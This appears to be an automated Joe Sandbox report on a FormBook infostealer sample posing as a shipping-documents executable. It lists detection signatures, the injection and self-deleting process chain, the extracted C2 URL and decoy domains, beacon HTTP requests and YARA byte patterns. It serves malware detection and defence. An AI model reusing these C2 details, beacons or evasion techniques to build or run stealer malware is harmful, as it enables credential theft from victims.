Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 202139769574 Shipping Documents.exe

Overview

General Information

Sample Name:202139769574 Shipping Documents.exe
Analysis ID:403523
MD5:eee5f618718bc8237bb9c7a48154cf1a
SHA1:84dc873f65dc9e86978944d1adddb762efcf2631
SHA256:cc7b066e0fa912d406c27790458ad6feb171b27275b6e3fe46b7a7574da7bfce
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 202139769574 Shipping Documents.exe (PID: 6728 cmdline: 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe' MD5: EEE5F618718BC8237BB9C7A48154CF1A)
    • 202139769574 Shipping Documents.exe (PID: 6808 cmdline: 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe' MD5: EEE5F618718BC8237BB9C7A48154CF1A)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 6488 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 5892 cmdline: /c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.magnumopuspro.com/nyr/"], "decoy": ["anemone-vintage.com", "ironcitytools.com", "joshandmatthew.com", "breathtakingscenery.photos", "karabakh-terror.com", "micahelgall.com", "entretiendesterrasses.com", "mhgholdings.com", "blewm.com", "sidewalknotary.com", "ytrs-elec.com", "danhpham.com", "ma21cle2henz.xyz", "lotusforlease.com", "shipleyphotoandfilm.com", "bulktool.xyz", "ouedzmala.com", "yichengvpr.com", "connectmygames.com", "chjcsc.com", "dope-chocolate.com", "tacowench.com", "projectsbay.com", "xn--pgboc92d.com", "royaldropofoil.com", "ranguanglian.club", "mobilne-kucice.com", "buytsycon.com", "goiasbets.net", "blpetroleum.com", "starrealms.net", "exclusiveflooringcollection.com", "kudalive.com", "tienda-sky.com", "drillinginsider.info", "theglasshousenyc.com", "vietnammoi.xyz", "walterbenicio.com", "zoomtvliveshows.xyz", "boujiehoodbaby.com", "yzyangyu.com", "exploreecetera.com", "sycord.com", "waykifood.com", "shadingconsultancy.com", "precedentai.net", "linhanhkitchen.com", "expekt24.com", "socialdating24.com", "lubvim.com", "floryi.com", "alerist.com", "maluss.com", "hitbbq.com", "alerrandrotattoo.com", "algoplayer.com", "idahooutsiders.com", "qygmuakhk.club", "neverpossible.com", "winparadigm.com", "toughdecorative.com", "yourbuildmedia.com", "summercrowd.com", "josemvazquez.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.magnumopuspro.com/nyr/"], "decoy": ["anemone-vintage.com", "ironcitytools.com", "joshandmatthew.com", "breathtakingscenery.photos", "karabakh-terror.com", "micahelgall.com", "entretiendesterrasses.com", "mhgholdings.com", "blewm.com", "sidewalknotary.com", "ytrs-elec.com", "danhpham.com", "ma21cle2henz.xyz", "lotusforlease.com", "shipleyphotoandfilm.com", "bulktool.xyz", "ouedzmala.com", "yichengvpr.com", "connectmygames.com", "chjcsc.com", "dope-chocolate.com", "tacowench.com", "projectsbay.com", "xn--pgboc92d.com", "royaldropofoil.com", "ranguanglian.club", "mobilne-kucice.com", "buytsycon.com", "goiasbets.net", "blpetroleum.com", "starrealms.net", "exclusiveflooringcollection.com", "kudalive.com", "tienda-sky.com", "drillinginsider.info", "theglasshousenyc.com", "vietnammoi.xyz", "walterbenicio.com", "zoomtvliveshows.xyz", "boujiehoodbaby.com", "yzyangyu.com", "exploreecetera.com", "sycord.com", "waykifood.com", "shadingconsultancy.com", "precedentai.net", "linhanhkitchen.com", "expekt24.com", "socialdating24.com", "lubvim.com", "floryi.com", "alerist.com", "maluss.com", "hitbbq.com", "alerrandrotattoo.com", "algoplayer.com", "idahooutsiders.com", "qygmuakhk.club", "neverpossible.com", "winparadigm.com", "toughdecorative.com", "yourbuildmedia.com", "summercrowd.com", "josemvazquez.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 202139769574 Shipping Documents.exeVirustotal: Detection: 33%Perma Link
          Source: 202139769574 Shipping Documents.exeReversingLabs: Detection: 31%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 202139769574 Shipping Documents.exeJoe Sandbox ML: detected
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 202139769574 Shipping Documents.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 202139769574 Shipping Documents.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.671162738.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 202139769574 Shipping Documents.exe, 00000001.00000003.646868549.0000000003230000.00000004.00000001.sdmp, 202139769574 Shipping Documents.exe, 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, mstsc.exe, 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 202139769574 Shipping Documents.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: 202139769574 Shipping Documents.exe, 00000002.00000002.701928540.0000000002700000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: 202139769574 Shipping Documents.exe, 00000002.00000002.701928540.0000000002700000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.671162738.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_0040659C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_004027A1 FindFirstFileA,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.magnumopuspro.com/nyr/
          Source: global trafficHTTP traffic detected: GET /nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1Host: www.maluss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1Host: www.exclusiveflooringcollection.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1Host: www.maluss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1Host: www.exclusiveflooringcollection.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.magnumopuspro.com
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 202139769574 Shipping Documents.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 202139769574 Shipping Documents.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000002.909702700.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: 202139769574 Shipping Documents.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: 202139769574 Shipping Documents.exe
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00419D5A NtCreateFile,
